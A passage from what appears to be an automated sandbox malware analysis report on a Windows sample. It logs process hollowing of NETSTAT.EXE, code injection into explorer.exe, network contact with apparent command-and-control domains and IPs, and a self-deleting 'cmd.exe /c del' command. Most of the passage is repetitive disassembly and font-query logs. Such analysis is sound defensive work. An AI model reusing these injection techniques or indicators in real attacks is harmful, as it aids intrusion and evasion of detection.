          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DDFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D2E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D5B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D31B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D31B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DDD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D2F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D2DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D3EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D53B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D53B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D2DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D3FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DBFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DBFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D5E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DBB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D29080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D5F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DBC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DBC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D4746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D5BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DD8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DB41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D5A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D4C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D47D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D63D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DA3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D2C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D2AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DAA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D44120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.thedreamcertificate.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 195.133.60.76 80
          Source: C:\Windows\explorer.exeDomain query: www.seahorseblast.net
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeMemory written: C:\Users\user\Desktop\6KdTCZit4e.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 200000
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess created: C:\Users\user\Desktop\6KdTCZit4e.exe C:\Users\user\Desktop\6KdTCZit4e.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\6KdTCZit4e.exe'
          Source: explorer.exe, 00000008.00000000.764098320.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000008.00000000.765144690.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000D.00000002.926995438.0000000004230000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.765144690.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000D.00000002.926995438.0000000004230000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.765144690.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000D.00000002.926995438.0000000004230000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.765144690.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000D.00000002.926995438.0000000004230000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000008.00000000.748412391.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Users\user\Desktop\6KdTCZit4e.exe VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
